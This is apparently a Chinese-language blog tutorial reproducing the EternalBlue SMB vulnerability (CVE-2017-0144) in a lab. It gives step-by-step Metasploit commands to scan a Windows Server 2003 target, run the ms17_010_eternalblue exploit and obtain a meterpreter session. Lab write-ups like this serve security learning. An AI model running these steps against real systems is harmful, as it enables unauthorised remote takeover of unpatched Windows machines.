CVE-2017-0144 “永恒之蓝” 漏洞复现

一.简介

CVE-2017-0144 即永恒之蓝,最早爆发于2017年4月14日晚,它是在Windows系统的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上获取了最高权限,可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二.环境准备

靶机:Windows Server 2003 

攻击机:Kali (自带 Metasploit)

三.复现过程

1. 关闭靶机的防火墙。(这里我的Windows版本可能跟你不同,但是位置一般差不多,在设置里搜索一下就可以找到)

2. 开启靶机的SMB服务(网上邻居 -> 属性)

点击 高级 -> 选择 高级设置 -> 开启 文件和打印机共享。(不同版本略有区别,一般都在 高级共享设置 里可以找到)

3. 开启 Kali ,输入命令 msfconsole ,启动 Metasploit 。

4.  输入命令,查看一下有关 永恒之蓝 漏洞的模块。

search ms17_010

有四个模块,前两个是漏洞利用模块,后两个是辅助模块,用于扫描漏洞。

5. 我们使用最后一个,先确定一下靶机是否存在永恒之蓝漏洞。

use auxiliary/scanner/smb/smb_ms17_010

6. 输入命令 options ,查看一下需要设置哪些参数,yes 表示需要我们自己设置,(有默认参数时可以不设置,也可以选择自己修改),no 表示不需要我们自己设置。

这里我们只需要设置 RHOSTS ,另外三个我们就不设置了,默认当前的设置就可以了。

7. RHOSTS 可以是一个确定的 ip 地址,也可以是一个 ip 地址的范围,如果确定了靶机的 ip 地址,就直接扫描一个确定的地址就可以了。

首先,在靶机上看一下 ip 地址是多少,输入命令 ipconfig 。

然后,就开始设置,在 Kali 上输入命令设置 RHOSTS 参数。

set rhosts 靶机的ip地址

8. 输入 run ,开始扫描。(有绿色标识符就说明有这个漏洞可以利用)

9. 进入漏洞利用模块,也就是刚刚搜索出来的四个模块,我们先用第一个模块来试试。

use exploit/windows/smb/ms17_010_eternalblue

然后 查看参数。

10. 这里跟上面一样,只需要设置 RHOSTS 。

11. 输入 run 。发现型号不匹配,没关系,换第二个模块。

12. 操作同上。到此为止,我们就拿到 meterpreter ,说明漏洞利用成功了。

13. 我们已经控制了靶机,接着就可以执行我们想要的任何命令了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值